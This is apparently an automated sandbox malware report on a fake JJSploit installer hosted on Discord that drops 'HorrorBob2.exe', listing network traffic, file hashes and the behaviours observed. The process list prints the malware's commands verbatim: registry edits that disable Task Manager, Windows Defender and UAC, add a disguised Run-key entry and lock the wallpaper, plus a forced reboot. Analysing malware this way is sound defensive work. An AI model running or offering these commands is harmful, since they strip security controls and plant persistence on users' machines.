Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369& was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Sets desktop wallpaper using registry
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies registry key
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
NTFS ADS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-20 20:44
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-20 20:44
Reported
2024-10-20 20:46
Platform
win11-20241007-en
Max time kernel
88s
Max time network
90s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\Downloads\HorrorBob2.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\shutdown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\HorrorBob2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133739307073391615" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "147" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\Downloads\HorrorBob2.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/824221029240274995/1296988829957357669/JJSploit_8.10.7_x64-setup.exe?ex=6714f339&is=6713a1b9&hm=72f841359f4ee2c0dea65d59ca550ad724169a9e1fb75ee81982119970e22369&
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1804,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2156,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2372 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4540,i,6794879011580597069,9444380280254170598,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaa1dccc40,0x7ffaa1dccc4c,0x7ffaa1dccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2220 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4428,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4248 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5008,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4284,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5220,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5232,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3316,i,16761896206580313646,4909248870113562005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\HorrorBob2.exe
"C:\Users\Admin\Downloads\HorrorBob2.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD23.tmp\HorrorBob2.bat" "
C:\Windows\SysWOW64\cscript.exe
cscript prompt.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a33855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 216.58.201.110:443 | consent.google.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| GB | 172.217.169.78:443 | clients2.google.com | udp |
| GB | 172.217.169.78:443 | clients2.google.com | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| US | 216.239.34.157:443 | tunnel.googlezip.net | tcp |
| GB | 216.58.201.110:443 | consent.google.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.110:443 | consent.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
\??\pipe\crashpad_3140_OENMXFHLMWOEDRLI
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13373930710838382
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
| MD5 | db7be30e1fc440e6c8c06071a1c85fab |
| SHA1 | ac74ed586af9c044467472d087ba14eaa3c6b2ef |
| SHA256 | 4348ef7c2769302a7cfdfe6acbed859c855879667ea25e6bd34fa6cb3fc89a4a |
| SHA512 | a7b63fca654c62198fba16d9e9818c31c96e86fb48a0aa6e5364ed9f57cac286d0f702824da9ec64220192e0a751daa745a10a0f8967dfb2d5f3c759101e381a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG
| MD5 | 6f2809522b67127214f29f176486322e |
| SHA1 | c021b8fcfa40fb837ab9162d9f3b9619ca40d5fc |
| SHA256 | 3c1855d1630c7db246ada37fe2226d26ee56fae99b514cd82c37b286bb414e25 |
| SHA512 | 03c067c4875c72a097384aac44fec7b675abd1ea07f6c654e719b03a82e7125b2e2c710fb69757e2b65724df9f550e99d0c79b451e0fedf9aa268d1116a9dd2c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2
| MD5 | 6c0d0b4aca0aa4a3cfcef60e2b35e643 |
| SHA1 | 2593bd7a9538a78111fbc9418ed733e8b4f76629 |
| SHA256 | bf363ec5ac05886d98c6c9015b7b2331899b6ae1dec2083a1d78d41dc591a865 |
| SHA512 | 6979f56ef023fb0d3dd9a4fdf707829882297d04de2acc4e2ee9180a5f16ac5708dbdd64993f8d35bbc5cba08812711fca7e559bea5c1f4e3015e33f2298bc83 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 7cc634082be7688a7eb31ff1d226ce79 |
| SHA1 | 79239c9542fbf916e3e33f551e887a64db997439 |
